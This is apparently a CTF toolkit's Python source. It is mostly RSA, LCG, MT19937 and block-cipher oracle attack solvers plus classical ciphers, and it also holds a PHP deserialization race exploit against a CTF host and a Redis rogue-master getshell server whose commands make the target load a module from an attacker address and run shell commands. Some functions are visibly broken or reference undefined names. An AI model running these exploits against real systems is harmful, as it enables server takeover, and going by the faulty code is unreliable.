from Crypto.Util.number import long_to_bytes
from gmpy2 import *


class ContinuedFraction():
    def __init__(self, numerator, denumerator):
        self.numberlist = []  # number in continued fraction
        self.fractionlist = []  # the near fraction list
        self.GenerateNumberList(numerator, denumerator)
        self.GenerateFractionList()

    def GenerateNumberList(self, numerator, denumerator):

        while numerator != 1:
            quotient = numerator // denumerator
            remainder = numerator % denumerator
            self.numberlist.append(quotient)
            numerator = denumerator
            denumerator = remainder

    def GenerateFractionList(self):
        self.fractionlist.append([self.numberlist[0], 1])
        for i in range(1, len(self.numberlist)):
            numerator = self.numberlist[i]
            denumerator = 1
            for j in range(i):
                temp = numerator
                numerator = denumerator + numerator * self.numberlist[i - j - 1]
                denumerator = temp
            self.fractionlist.append([numerator, denumerator])


def Solve(a, b, c):
    """solve ax^2+bx+c=0 , return x1 , x2"""
    delta = b ** 2 - 4 * a * c
    if delta < 0:
        return 0
    if is_square(delta):
        sqr_delta = isqrt(delta)
        temp1 = -b + sqr_delta
        temp2 = -b - sqr_delta
        if temp1 % (2 * a) != 0 or temp2 % (2 * a) != 0:
            return 0
        else:
            return [temp1 // (2 * a), temp2 // (2 * a)]
    else:
        return 0


def attack(n, e):
    a = ContinuedFraction(e, n)
    for i in a.fractionlist:
        k = i[0]
        d = i[1]
        if k == 0:
            continue
        phi = (d * e - 1) // k
        b = phi - n - 1
        temp = Solve(1, b, n)
        if isinstance(temp, list):
            p, q = temp
            return d, p, q
    return None, None, None

n = 101991809777553253470276751399264740131157682329252673501792154507006158434432009141995367241962525705950046253400188884658262496534706438791515071885860897552736656899566915731297225817250639873643376310103992170646906557242832893914902053581087502512787303322747780420210884852166586717636559058152544979471
e = 46731919563265721307105180410302518676676135509737992912625092976849075262192092549323082367518264378630543338219025744820916471913696072050291990620486581719410354385121760761374229374847695148230596005409978383369740305816082770283909611956355972181848077519920922059268376958811713365106925235218265173085

d, p, q = attack(n, e)

c= powmod(123456, e, n)
print(powmod(c, d, n))
print(d)

# print(long_to_bytes(powmod(c,d,n)))


import io
import requests
import threading


def write(session):
    while True:
        resp = session.post('http://eci-2zehk6qgv7x3nlpw8m3k.cloudeci1.ichunqiu.com/admin/preload.php', data={
            'a': 'O:7:"preload":3:{s:5:"class";N;s:8:"contents";s:35:"new hacker();phpinfo();echo \'xenny\'?>";s:6:"method";N;}'},
                            cookies={'PHPSESSID': 'mt2c60k1mv9b5f8qivr0kujgg6'})


def read(session):
    while True:
        resp = session.get('http://eci-2zehk6qgv7x3nlpw8m3k.cloudeci1.ichunqiu.com/admin/hack.php',
                           cookies={'PHPSESSID': 'mt2c60k1mv9b5f8qivr0kujgg6'})
        if 'xenny' in resp.text:
            print(resp.text)
            event.clear()


if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
    event.set()



def encode(content: bytes, key: int):
    while key < 0:
        key += 26
    p = list(content)
    oa = ord('a')
    oz = ord('z')
    oA = ord('A')
    oZ = ord('Z')
    for i in range(len(p)):
        if oa <= p[i] <= oz:
            p[i] = oa + (p[i] - oa + key) % 26
        elif oA <= p[i] <= oZ:
            p[i] = oA + (p[i] - oA + key) % 26
    return bytes(p)


def decode(cipher: bytes, key: int):
    return encode(cipher, 26-key)


if __name__ == '__main__':
    s = b'mshn{jhlzhy_jpwoly_lujvkl}'
    for i in range(26):
        print(decode(s, i))


# -*- coding: utf-8 -*-
"""
-------------------------------------------------
   File Name :      playfair
   Description :
   Author :         x3nny
   date :           2021/10/29
-------------------------------------------------
   Change Activity:
                    2021/10/29: Init
-------------------------------------------------
"""
__author__ = 'x3nny'

from pycipher import Playfair
from string import ascii_uppercase


def encode(s: str, key: str):
    key = key.upper()
    skey = ''
    for i in key:
        if i not in skey:
            skey += i
    for i in ascii_uppercase:
        if i == 'J': continue
        if i not in key:
            skey += i

    return Playfair(skey).encipher(s)


def decode(s: str, key: str):
    key = key.upper()
    skey = ''
    for i in key:
        if i not in skey:
            skey += i
    for i in ascii_uppercase:
        if i == 'J': continue
        if i not in key:
            skey += i

    return Playfair(skey).decipher(s)

if __name__ == '__main__':
    s = 'flagispass'
    print(encode(s, 'hello'))
    print(decode(encode(s, 'hello'),'hello'))


# -*- coding: utf-8 -*-

import logging

logger_levels = {
    "CRITICAL": logging.CRITICAL,
    "ERROR": logging.ERROR,
    "WARNING": logging.WARNING,
    "DEBUG": logging.DEBUG,
    "INFO": logging.INFO,
}


class CustomFormatter(logging.Formatter):
    """Logging Formatter to add colors and count warning / errors"""

    grey = "\x1b[38;21m"
    yellow = "\x1b[33;21m"
    red = "\x1b[31;21m"
    bold_red = "\x1b[31;1m"
    reset = "\x1b[0m"
    f = "%(message)s"

    FORMATS = {
        logging.DEBUG: grey + f + reset,
        logging.INFO: grey + f + reset,
        logging.WARNING: yellow + f + reset,
        logging.ERROR: red + f + reset,
        logging.CRITICAL: bold_red + f + reset,
    }

    def format(self, record):
        log_fmt = self.FORMATS.get(record.levelno)
        formatter = logging.Formatter(log_fmt)
        return formatter.format(record)



from pwn import *


def to_p64(addr):
    if isinstance(addr, int):
        return p64(addr)
    return addr


def rop2(pop_rdi, param_addr, ret_addr):
    payload =  to_p64(pop_rdi)      # pop rdi
    payload += to_p64(param_addr)   # attr_addr
    payload += to_p64(ret_addr)     # ret
    return payload


def rop6(pop6, r12, r13, r14, r15, rop2_addr, ret_addr):
    payload =  to_p64(pop6)         # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
    payload += to_p64(0)            # rbx
    payload += to_p64(1)            # rbp
    payload += to_p64(r12)          # r12 -> rip
    payload += to_p64(r13)          # r13 -> rdx
    payload += to_p64(r14)          # r14 -> rsi
    payload += to_p64(r15)          # r15 -> rdi
    payload += to_p64(rop2_addr)    # $:mov rdx, r13;
                                    # mov rsi, r14;
                                    # mov edi, r15;
                                    # call ds:[r12+rbx*8]
                                    # add rbx, 1
                                    # cmp rbx, rbp
                                    # jnz short $
                                    # pop6;ret
    payload += b'a'*56
    payload += to_p64(ret_addr)
    return payload


def to_address(addr, keepline=True):
    if keepline and addr.endswith(b'\n'):
        addr = addr[:-1]
    return u64(addr.ljust(8, b'\x00'))



from typing import List

from Crypto.Util.number import long_to_bytes
import logging

from gmpy2 import powmod, invert

from ctf.crypto.modern.asymmetric.rsa import small_plain, wiener, schemidt_samoa, williams_pp1, pollard_p_1, ex_wiener
from ctf.crypto.modern.asymmetric.rsa import dpleak
from util.utils import is_sage

ATTACKS = [
    'dpdqleak',
    'dpleak',
    'small_plain',
    'wiener',
    'schemidt_samoa',
    'williams_pp1',
    'pollard_p_1',
    'ex_wiener',
    'factordb',
    'amm',
    'same_module',
    'lowe_broadcast',
    'rabin'
]
SAGE_ATTACKS = set('ex_wiener')


class key:
    def __init__(self,
                 n=None,
                 e=None,
                 d=None,
                 p=None,
                 q=None,
                 dp=None,
                 dq=None,
                 phi=None,
                 u=None,
                 m=None,
                 c=None):
        self.n = n
        self.e = e
        self.d = d
        self.p = p
        self.q = q
        self.dp = dp
        self.dq = dq
        self.phi = phi
        self.u = u
        self.m = [m]
        self.c = c

    @staticmethod
    def from_pem(pem): ...

    @staticmethod
    def from_der(der): ...


class RSA:
    timout_seconds = 60

    def __init__(self, keys, timeout=60):
        self.logger = logging.getLogger("global_logger")
        if isinstance(keys, list):
            self.keys = keys
        elif isinstance(keys, key):
            self.keys = [key]
        else:
            raise Exception("argument must be a list or a key object, not '{}'".format(keys.__class__.__name__))

        self.timout_seconds = timeout

    def print_m(self):
        for key in self.keys:
            if key.m is not None:
                for m in key.m:
                    print(long_to_bytes(m))

    def get_m(self):
        res = []
        for key in self.keys:
            if key.m is not None:
                res.append(key.m)
        return res

    def attack(self, attacks=None):
        """
        attacks:
            'dpdqleak',
            'dpleak',
            'small_plain',
            'wiener',
            'schemidt_samoa',
            'williams_pp1',
            'pollard_p_1',
            'ex_wiener',
            'factordb',
            'amm',
        :param attacks:
        :return:
        """
        if attacks is None:
            attacks = ATTACKS
        if isinstance(attacks, str):
            attacks = [attacks]

        for attack in attacks:
            try:
                if attack in SAGE_ATTACKS:
                    if not is_sage():
                        self.logger.warning(
                            "[!] Can't load %s because sage is not installed" % attack
                        )
                        continue
                self.logger.info(
                    "[*] Performing %s attack." % attack
                )
                self.__getattribute__(attack + '_attack')()
            except IndentationError:
                raise IndentationError("no attack '{}'".format(attack))
            except Exception:
                pass

    def dpdqleak_attack(self):
        for key in self.keys:
            if key.dp is not None and \
                    key.dq is not None and \
                    key.q is not None and \
                    key.p is not None and \
                    key.c is not None:
                try:
                    res = dpleak.dpdqleak(key.dp, key.dq, key.p, key.q, key.c)
                    key.m.append(res)
                except Exception:
                    pass

    def dpleak_attack(self):
        for key in self.keys:
            if key.e is not None and \
                    key.dp is not None and \
                    key.n is not None and \
                    key.c is not None:
                try:
                    key.m.append(dpleak.dpdqleak(key.e, key.dp, key.n.key.c, self.timout_seconds))
                except Exception:
                    pass

    def small_plain_attack(self):
        for key in self.keys:
            if key.e is not None and \
                    key.c is not None:
                key.m.append(small_plain.attack(key.e, key.c))

    def wiener_attack(self):
        for key in self.keys:
            if key.e is not None and \
                    key.n is not None:
                d, p, q = wiener.attack(key.n, key.e)
                if d is not None:
                    key.d = d
                    key.p = p
                    key.q = q
                    if key.c is not None:
                        key.m.append(powmod(key.c, d, key.n))
                    # self.logger("[+] Find d: %d" % d)

    def schemidt_samoa_attack(self):
        for key in self.keys:
            if key.n is not None and \
                    key.d is not None and \
                    key.c is not None:
                key.m.append(schemidt_samoa.attack(key.n, key.d, key.c))

    def williams_pp1_attack(self):
        for key in self.keys:
            if key.n is not None:
                p, q = williams_pp1.attack(key.n, timeout=self.timout_seconds)
                if p is not None:
                    key.p = p
                    key.q = q
                    if key.c is not None and key.e is not None:
                        key.m.append(powmod(key.c, invert(key.e, (key.p-1)*(key.q-1)), key.n))


    def pollard_p_1_attack(self):
        for key in self.keys:
            if key.n is not None:
                p, q = pollard_p_1.attack(key.n, timeout=self.timout_seconds)
                if p is not None:
                    key.p = p
                    key.q = q
                    if key.c is not None and key.e is not None:
                        key.m.append(powmod(key.c, invert(key.e, (key.p - 1) * (key.q - 1)), key.n))


    def ex_wiener_attack(self):
        for key1 in self.keys:
            for key2 in self.keys:
                if key1.e != key2.e and \
                    key1.e != None and \
                    key2.e != None and \
                    key1.n == key2.n and \
                    key1.n != None:
                    p,q = ex_wiener.attack(key1.n, key1.e, key2.e)
                    if p is not None:
                        key1.p = key2.p = p
                        key2.q = key2.q = q
                        if key1.c is not None:
                            key1.m.append(powmod(key1.c, invert(key1.e, (key1.p - 1) * (key1.q - 1)), key1.n))
                        if key2.c is not None:
                            key2.m.append(powmod(key2.c, invert(key2.e, (key2.p - 1) * (key2.q - 1)), key2.n))

    def factordb_attack(self):
        ...

    def amm_attack(self):
        ...

    def same_module_attack(self):
        ...

    def lowe_broadcast_attack(self):
        ...

    def rabin_attack(self):
        ...


class test:
    def a(self):
        try:
            self.__getattribute__('c')
        except AttributeError:
            raise AttributeError("no attack '{}'".format('123'))

    def b(self, a):
        print(a + 1)


if __name__ == '__main__':
    test().a()



from gmpy2 import invert, iroot


def attack(e, n_list, c_list):
    n = 1
    for i in n_list:
        n *= i
    N = []
    for i in n_list:
        N.append(n//i)

    t = []
    for i in range(len(n_list)):
        t.append(invert(N[i], n_list[i]))

    summary = 0
    for i in range(len(n_list)):
        summary = (summary + c_list[i]*t[i]*N[i]) % n

    summary = iroot(summary, e)
    return summary


from gmpy2 import *


class LCG:
    def __init__(self, a, b, n, seed):
        self.a = a
        self.b = b
        self.n = n
        self.state = seed

    def extract_number(self):
        self.state = (self.a*self.state + self.b) % self.n
        return self.state


def recover_seed(a, b, n, output, index):
    """
    恢复种子
    :param a:
    :param b:
    :param n:
    :param output:
    :return:
    """
    ani = invert(a, n)
    seed = output[-1]
    for i in range(index):
        seed = (ani*(seed - b)%n + n) % n
    return seed


def recover_b(a, n, output):
    """
    恢复b
    :param a:
    :param n:
    :param output: len(output) >= 2
    :return:
    """
    b = (output[1] - a*output[0]%n + n) % n
    return b


def recover_a(n, output):
    """
    恢复a
    :param n:
    :param output: len(output) >= 3
    :return:
    """
    a = (output[2] - output[1]) * invert((output[1] - output[0]), n) % n
    return a


def recover_n(output):
    """
    恢复n
    :param output: len(output) >= 6
    :return:
    """
    t = []
    l = len(output)
    for i in range(1, l):
        t.append(output[i] - output[i-1])
    n = 0
    for i in range(l - 2):
        n = gcd((t[i+1]*t[i-1] - t[i]*t[i]), (t[i+2]*t[i] - t[i+1]*t[i+1]))
        if n != 1:
            return n



def attack(n = None, a = None, b = None, seed = None, output=None, index = None):
    if output is None:
        raise Exception("output can't be None")
    if n is None:
        n = recover_n(output)
    if a is None:
        a = recover_a(n, output)
    if b is None:
        b = recover_b(a, n, output)

    if index is None:
        return recover_seed(a, b, n, output, len(output))

    return recover_seed(a, b, n, output, index)


from gmpy2 import powmod, invert
from Crypto.Util.number import *


def attack(c, n, p, q):
    c1 = powmod(c, (p+1)//4, p)
    c2 = powmod(c, (q+1)//4, q)
    cp1 = p - c1
    cp2 = q - c2

    t1 = invert(p, q)
    t2 = invert(q, p)

    m1 = (q*c1*c2 + p*c2*t1) % n
    m2 = (q*c1*t2 + p*cp2*t1) % n
    m3 = (q*cp1*t2 + p*c2*t1) % n
    m4 = (q*cp1*t2 + p*cp2*t1) % n

    return m1, m2, m3, m4
p = 275127860351348928173285174381581152299
q = 319576316814478949870590164193048041239
n = p*q
c = open('/Users/x3nny/Downloads/hardRSA/flag.enc', 'rb').read()
c = bytes_to_long(c)
m = attack(c,n,p,q)
# print(m)
for i in m:
    print(long_to_bytes(i))


# -*- coding: utf-8 -*-
"""
-------------------------------------------------
   File Name :      rogue
   Description :    https://github.com/vulhub/redis-rogue-getshell
   Author :         x3nny
   date :           2021/6/30
-------------------------------------------------
   Change Activity:
                    2021/6/30: Init
-------------------------------------------------
"""
__author__ = 'x3nny'

import os
import sys
import argparse
import socketserver
import logging
import socket
import time

logging.basicConfig(stream=sys.stdout, level=logging.INFO, format='>> %(message)s')

DELIMITER = b"\r\n"

class RoguoHandler(socketserver.BaseRequestHandler):
    def decode(self, data):
        if data.startswith(b'*'):
            return data.strip().split(DELIMITER)[2::2]
        if data.startswith(b'$'):
            return data.split(DELIMITER, 2)[1]

        return data.strip().split()

    def handle(self):
        while True:
            data = self.request.recv(1024)
            logging.info("receive data: %r", data)
            arr = self.decode(data)
            if arr[0].startswith(b'PING'):
                self.request.sendall(b'+PONG' + DELIMITER)
            elif arr[0].startswith(b'REPLCONF'):
                self.request.sendall(b'+OK' + DELIMITER)
            elif arr[0].startswith(b'PSYNC') or arr[0].startswith(b'SYNC'):
                self.request.sendall(b'+FULLRESYNC ' + b'Z' * 40 + b' 1' + DELIMITER)
                self.request.sendall(b'$' + str(len(self.server.payload)).encode() + DELIMITER)
                self.request.sendall(self.server.payload + DELIMITER)
                break

        self.finish()

    def finish(self):
        self.request.close()


class RoguoServer(socketserver.TCPServer):
    allow_reuse_address = True

    def __init__(self, server_address, payload):
        super(RoguoServer, self).__init__(server_address, RoguoHandler, True)
        self.payload = payload


if __name__=='__main__':
    expfile = 'exp.so'
    lport = 6379
    with open(expfile, 'rb') as f:
        server = RoguoServer(('0.0.0.0', lport), f.read())
    server.handle_request()


'''
*2
$4
AUTH
$4
root
*1
$7
COMMAND
*3
$7
slaveof
$12
xxx.xx.xx.xx
$4
8998
*3
$6
module
$4
load
$10
./dump.rdb
*2
$11
system.exec
$9
cat /flag
*1
$4
quit
'''


def rc4(key, content):
    key_len = len(key)
    S = [i for i in range(256)]
    T = [key[i % key_len] for i in range(256)]

    j = 0
    for i in range(256):
        j = (j + S[i] + T[i]) % 256
        S[i], S[j] = S[j], S[i]

    i = j = 0
    res = []
    for c in content:
        i = (i+1) % 256
        j = (j+S[i]) % 256
        S[i], S[j] = S[j], S[i]
        t = (S[i] + S[j]) % 256
        res.append(c ^ t)
    return bytes(res)


def encode(content: bytes):
    p = list(content)
    oa = ord('a')
    oz = ord('z')
    oA = ord('A')
    oZ = ord('Z')
    for i in range(len(p)):
        if oa <= p[i] <= oz:
            p[i] = oa + 25 - p[i] + oa
        elif oA <= p[i] <= oZ:
            p[i] = oA + 25 - p[i] + oA
    return bytes(p)


def decode(cipher: bytes):
    return encode(cipher)


if __name__ == '__main__':
    s = b'gsv_pvb_rh_zgyzhs'
    print(decode(s))


from hashlib import md5, sha256, sha1
import re
from itertools import product
from string import ascii_letters, digits

default_alphabet = list(ascii_letters + digits)

def proof_of_work(known, cipher, encrypt, alphabet=None):
    """
    ctf中常见的的hash工作量证明，known是hex数据，未知量使用xx代替，例如31xx32xx代表1?2?
    :param known:
    :param cipher:
    :param encrypt: hashlib.md5, sha1, sha256 etc...
    :return:
    """
    if alphabet is None:
        alphabet = default_alphabet
    known = known.lower().split('xx')
    for i in range(len(known)):
        known[i] = bytes.fromhex(known[i])
    # print(known)
    for v in product(alphabet, repeat=len(known)-1):
        tmp = known[0]
        for i in range(len(v)):
            tmp += v[i].encode() + known[i+1]
        # print(tmp)
        print(len(encrypt(encrypt(tmp).digest()).hexdigest()))
        if encrypt(encrypt(tmp).digest()).hexdigest() == cipher:
            return v, tmp

if __name__ == '__main__':
    s = 'd1faec9480b4e6d619aa0061b04827f3d5af1c2c'
    print(hex(int.from_bytes(proof_of_work('df9a936bb8dd93xxxxxx', s, sha1, [chr(_) for _ in range(256)])[1], 'big')))


try:
    from . import caesar
except:
    import caesar


def rot5(content: bytes):
    p = list(content)
    for i in range(len(p)):
        if ord('0') <= p[i] <= ord('9'):
            p[i] = ord('0') + (p[i] - ord('0') + 5) % 10
    return bytes(p)


def rot13(content: bytes):
    return caesar.encode(content, 13)


def rot18(content: bytes):
    return rot5(rot13(content))


def rot47(content: bytes):
    p = list(content)
    for i in range(len(p)):
        if 33 <= p[i] <= 126:
            p[i] = 33 + (p[i] - 33 + 47) % (126 - 33 + 1)
    return bytes(p)

if __name__ == '__main__':
    s = rot47(b'v)*L*_F0<}@H0>F49023@FE0#@EN')
    print(s)
    # print(rot18(s))


from pwn import *

bytesxor = lambda a, b: bytes(i ^ j for i, j in zip(a, b))


def get_last_bit(known, cipher, IV, encrypt):
    """known: first 15 bytes that we know
    cipher: Ek(known+?) where ? is one byte that we want to get returns(?,IV)
    """
    for i in range(256):
        rec = encrypt(bytesxor(IV, known + bytes([i])))  # Ek(known+i) where len(known)=15,len(i)=1
        IV = rec[-16:]
        if rec[:16] == cipher:
            return bytes([i]), IV
    return None


def cbc_blasting_attack(N, IV, encrypt):
    """
    :param N:
    :param IV:
    :param encrypt: (s: bytes) -> bytes
    :return:
    """
    flag = b""
    for k in range(N):
        # k=0:secret[0:15]l={15,14,...,1}
        # k=1:secret[15:31]l={16,15,...,1}
        # k=2:secret[31:47]l={16,15,...,1}
        # k=3:secret[47:48]l={16}
        start = 15 if k == 0 else 16
        end = 15 if k == N - 1 else 0
        for l in range(start, end, -1):
            rec = encrypt(IV[:l])
            if k == 0:
                s = b"\x00" * l + bytesxor(IV[l:-1], flag)
                last_byte = IV[-1:]
                cipher, IV = rec[:16], rec[-16:]
            else:
                kIV, cipher, IV = rec[16 * (k - 1):16 * k], rec[16 * k:16 * (k + 1)], rec[-16:]
                s = xor(kIV, flag[-15:])
                last_byte = kIV[-1:]
            byte, IV = get_last_bit(s, cipher, IV, encrypt)
            flag += bytesxor(byte, last_byte)
            # print(flag.hex(),len(flag))
    return flag



def ecb_blasting_attack(N, encrypt):
    s = b'0' * (16*N - 1)
    flag = b''
    for i in range(16*N):
        rec = encrypt(s)[:16*N]
        for j in range(256):
            tmp = b'0' * (16*N - i) + flag + bytes([j])
            res = encrypt(tmp)[:16*N]
            if rec == res:
                flag += bytes([j])
                # print(flag)
                s = s[:-1]
                break
    return flag


from random import Random
from gmpy2 import invert


def _int32(x):
    return int(0xFFFFFFFF & x)


class MT19937:
    # 根据seed初始化624的state
    def __init__(self, seed):
        self.mt = [0] * 624
        self.mt[0] = seed
        self.mti = 0
        for i in range(1, 624):
            self.mt[i] = _int32(1812433253 * (self.mt[i - 1] ^ self.mt[i - 1] >> 30) + i)


    # 提取伪随机数
    def extract_number(self):
        if self.mti == 0:
            self.twist()
        y = self.mt[self.mti]
        y = y ^ y >> 11
        y = y ^ y << 7 & 2636928640
        y = y ^ y << 15 & 4022730752
        y = y ^ y >> 18
        self.mti = (self.mti + 1) % 624
        return _int32(y)

    # 对状态进行旋转
    def twist(self):
        for i in range(0, 624):
            y = _int32((self.mt[i] & 0x80000000) + (self.mt[(i + 1) % 624] & 0x7fffffff))
            self.mt[i] = (y >> 1) ^ self.mt[(i + 397) % 624]
            if y % 2 != 0:
                self.mt[i] = self.mt[i] ^ 0x9908b0df


def inverse_right(res, shift, bits=32):
    tmp = res
    for i in range(bits // shift):
        tmp = res ^ tmp >> shift
    return tmp


def inverse_left(res, shift, bits=32):
    tmp = res
    for i in range(bits // shift):
        tmp = res ^ tmp << shift


def inverse_right_mask(res, shift, mask, bits=32):
    tmp = res
    for i in range(bits // shift):
        tmp = res ^ tmp >> shift & mask
    return tmp


def inverse_left_mask(res, shift, mask, bits=32):
    tmp = res
    for i in range(bits // shift):
        tmp = res ^ tmp << shift & mask
    return tmp


# 通过mt中的任一位逆向seed
def inv_init(last, index=623):
    n = 1 << 32
    inv = invert(1812433253, n)
    for i in range(index, 0, -1):
        last = ((last - i) * inv) % n
        last = _int32(inverse_right(last, 30))
    return last


# 逆向提取伪随机数
def inv_extract_number(y):
    y = inverse_right(y, 18)
    y = inverse_left_mask(y, 15, 4022730752)
    y = inverse_left_mask(y, 7, 2636928640)
    y = inverse_right(y, 11)
    return y & 0xffffffff


# 逆向提取state，多轮twist情况
def inv_twist(cur):
    """
    恢复state
    :param cur: length >= 1000
    :return:
    """
    high = 0x80000000
    low = 0x7fffffff
    mask = 0x9908b0df
    state = cur
    for i in range(3, -1, -1):
        tmp = state[i + 624] ^ state[i + 397]
        # recover Y,tmp = Y
        if tmp & high == high:
            tmp ^= mask
            tmp <<= 1
            tmp |= 1
        else:
            tmp <<= 1
        # recover highest bit
        res = tmp & high
        # recover other 31 bits,when i =0,it just use the method again it so beautiful!!!!
        tmp = state[i - 1 + 624] ^ state[i + 396]
        # recover Y,tmp = Y
        if tmp & high == high:
            tmp ^= mask
            tmp <<= 1
            tmp |= 1
        else:
            tmp <<= 1
        res |= (tmp) & low
        state[i] = res
    return state


# other impl
# def backtrace(cur):
#     high = 0x80000000
#     low = 0x7fffffff
#     mask = 0x9908b0df
#     state = cur
#     for i in range(623,-1,-1):
#         tmp = state[i]^state[(i+397)%624]
#         # recover Y,tmp = Y
#         if tmp & high == high:
#             tmp ^= mask
#             tmp <<= 1
#             tmp |= 1
#         else:
#             tmp <<=1
#         # recover highest bit
#         res = tmp&high
#         # recover other 31 bits,when i =0,it just use the method again it so beautiful!!!!
#         tmp = state[i-1]^state[(i+396)%624]
#         # recover Y,tmp = Y
#         if tmp & high == high:
#             tmp ^= mask
#             tmp <<= 1
#             tmp |= 1
#         else:
#             tmp <<=1
#         res |= (tmp)&low
#         state[i] = res
#     return state
def recover_state(record):
    """
    恢复624个state，即可预测后面的随机数
    :param record: 624个随机数
    :return:
    """
    state = [inv_extract_number(i) for i in record]
    # gen = Random()
    # gen.setstate((3, tuple(state + [0]), None))
    return state

def recover_mt(record) -> Random:
    """
    恢复624个state，即可预测后面的随机数
    :param record: 624个随机数
    :return:
    """
    state = [inv_extract_number(i) for i in record][:624]
    gen = Random()
    gen.setstate((3, tuple(state + [0]), None))
    return gen

# from sage.all import *
# def buildT():
#     rng = Random()
#     T = matrix(GF(2),32,32)
#     for i in range(32):
#         s = [0]*624
#         # 构造特殊的state
#         s[0] = 1<<(31-i)
#         rng.setstate((3,tuple(s+[0]),None))
#         tmp = rng.getrandbits(32)
#         # 获取T矩阵的每一行
#         row = vector(GF(2),[int(x) for x in bin(tmp)[2:].zfill(32)])
#         T[i] = row
#     return T
# def reverse(T,leak):
#     Z = vector(GF(2),[int(x) for x in bin(leak)[2:].zfill(32)])
#     X = Z*(T**-1) # T.solve_left(Z)
#     state = int(''.join([str(i) for i in X]),2)
#     return state
# def test():
#     rng = Random()
#     # 泄露信息
#     leak = [rng.getrandbits(32) for i in range(32)]
#     originState = [i for i in rng.getstate()[1][:32]]
#     # 构造矩阵T
#     T = buildT()
#     recoverState = [reverse(T,i) for i in leak]
#     print(recoverState,originState)
# test()


# mt = MT19937(1825637141)
# print(mt.mt)
# print(mt.extract_number())
# print(mt.extract_number())
# print(inv_init(mt.mt[623]))
# for i in range(227):
#     mt.extract_number()
# print(mt.extract_number())
# print(mt.extract_number())


#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import re
import gmpy2
import requests


def attack(n, e, cipher=[]):
    url_1 = "http://factordb.com/index.php?query=%i"
    url_2 = "http://factordb.com/index.php?id=%s"
    s = requests.Session()
    r = s.get(url_1 % n, verify=False)
    regex = re.compile(r"index\.php\?id\=([0-9]+)", re.IGNORECASE)
    ids = regex.findall(r.text)

    # check if only 1 factor is returned
    if len(ids) == 2:
        # theres a chance that the only factor returned is prime, and so we can derive the priv key from it
        regex = re.compile(r"<td>P<\/td>")
        prime = regex.findall(r.text)
        if len(prime) == 1:
            # n is prime, so lets get the key from it
            d = gmpy2.invert(e, n - 1)
            # construct key using only n and d
            priv_key = PrivateKey(e=int(publickey.e), n=int(publickey.n), d=d)
            return (priv_key, None)

    elif len(ids) == 3:
        try:
            regex = re.compile(r'value="([0-9\^\-]+)"', re.IGNORECASE)
            p_id = ids[1]
            r_1 = s.get(url_2 % p_id, verify=False)
            key_p = regex.findall(r_1.text)[0]
            publickey.p = int(key_p) if key_p.isdigit() else solveforp(key_p)

            q_id = ids[2]
            r_2 = s.get(url_2 % q_id, verify=False)
            key_q = regex.findall(r_2.text)[0]
            publickey.q = int(key_q) if key_q.isdigit() else solveforp(key_q)

            if publickey.n != int(publickey.p) * int(publickey.q):
                return (None, None)

        except IndexError:
            return (None, None)

        try:
            priv_key = PrivateKey(
                p=int(publickey.p),
                q=int(publickey.q),
                e=int(publickey.e),
                n=int(publickey.n),
            )
        except ValueError:
            return (None, None)

        return (priv_key, None)
    elif len(ids) > 3:
        phi = 1
        for p in ids[1:]:
            phi *= int(p) - 1
        d = invmod(publickey.e, phi)
        plains = []
        for c in cipher:
            int_big = int.from_bytes(c, "big")
            plain1 = pow(int_big, d, publickey.n)
            plains.append(long_to_bytes(plain1))
        return (None, plains)

if __name__ == '__main__':
    print(attack())



import subprocess


def is_sage():
    """Check if sage is installed and working"""
    try:
        sageversion = subprocess.check_output(["sage", "-v"], timeout=10)
    except OSError:
        return False

    if "SageMath version" in sageversion.decode("utf-8"):
        return True
    else:
        return False



from os import path as os_path
from setuptools import find_packages, setup

# import xenny

this_directory = os_path.abspath(os_path.dirname(__file__))

# 读取文件内容
def read_file(filename):
    with open(os_path.join(this_directory, filename), encoding='utf-8') as f:
        long_description = f.read()
    return long_description

# 获取依赖
def read_requirements(filename):
    return [line.strip() for line in read_file(filename).splitlines()
            if not line.startswith('#')]
# print(find_packages('.'))
setup(
    name='xenny',  # 包名
    python_requires='>=3.8.0', # python环境
    version='1.1',#xenny.__version__, # 包的版本
    description="Xenny's tool",  # 包简介，显示在PyPI上
    long_description=read_file('README.md'), # 读取的Readme文档内容
    long_description_content_type="text/markdown",  # 指定包文档格式为markdown
    author="X3NNY", # 作者相关信息
    author_email='xennyxd1@gmail.com',
    url='https://github.com/X3NNY/xenny',
    # 指定包信息，还可以用find_packages()函数
    packages=find_packages('.'),
    install_requires=read_requirements('requirements.txt'),  # 指定需要安装的依赖
    include_package_data=True,
    license="MIT",
    keywords=['ctf', 'xenny', 'web', 'misc', 'crypto', 'reverse', 'pwn'],
    classifiers=[
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Natural Language :: English',
        'Programming Language :: Python :: 3.8',
        'Programming Language :: Python :: 3.9',
    ],
)



def exgcd(a, b):
    """
    Solve a*x + b*y = gcd(a, b)
    :param a:
    :param b:
    :return: gcd, x, y
    """
    if a == 0:
        return b, 0, 1
    g, y, x = exgcd(b % a, a)
    return g, x-(b//a)*y, y





# This file was *autogenerated* from the file ctf/crypto/modern/symmetric/rlwe.sage
from sage.all_cmdline import *   # import sage library

_sage_const_128 = Integer(128); _sage_const_40961 = Integer(40961); _sage_const_1 = Integer(1); _sage_const_2 = Integer(2)
from sage.stats.distributions.discrete_gaussian_polynomial import DiscreteGaussianDistributionPolynomialSampler as d_gauss

# flag = bytearray(input().encode())
# flag = list(flag)

n = _sage_const_128 
q = _sage_const_40961 

## Finite Field of size q.
F = GF(q)

## Univariate Polynomial Ring in y over Finite Field of size q
R = PolynomialRing(F, names=('y',)); (y,) = R._first_ngens(1)

## Univariate Quotient Polynomial Ring in x over Finite Field of size 40961 with modulus b^n + 1
S = R.quotient(y**n + _sage_const_1 , names=('x',)); (x,) = S._first_ngens(1)

def gen_small_poly():
    sigma = _sage_const_2 /sqrt(_sage_const_2 *pi)
    d = d_gauss(S, n, sigma)
    return d()

def gen_large_poly():
    return S.random_element()
t = _sage_const_128 

def key_gen():
    r1, r2 = gen_small_poly(), gen_small_poly()

    p = r1 - t*r2
    return p, r2


def encrypt(p, m):
    e1, e2, e3 = gen_small_poly(), gen_small_poly(), gen_small_poly()
    c1 = t*e1 + e2
    c2 = p*e1+ e3 + m*(q//_sage_const_2 )
    return c1, c2


def decrypt(s, c1, c2):
    m = c1*s + c2
    return m

p, s = key_gen()
c1, c2 = encrypt(p, _sage_const_1 )
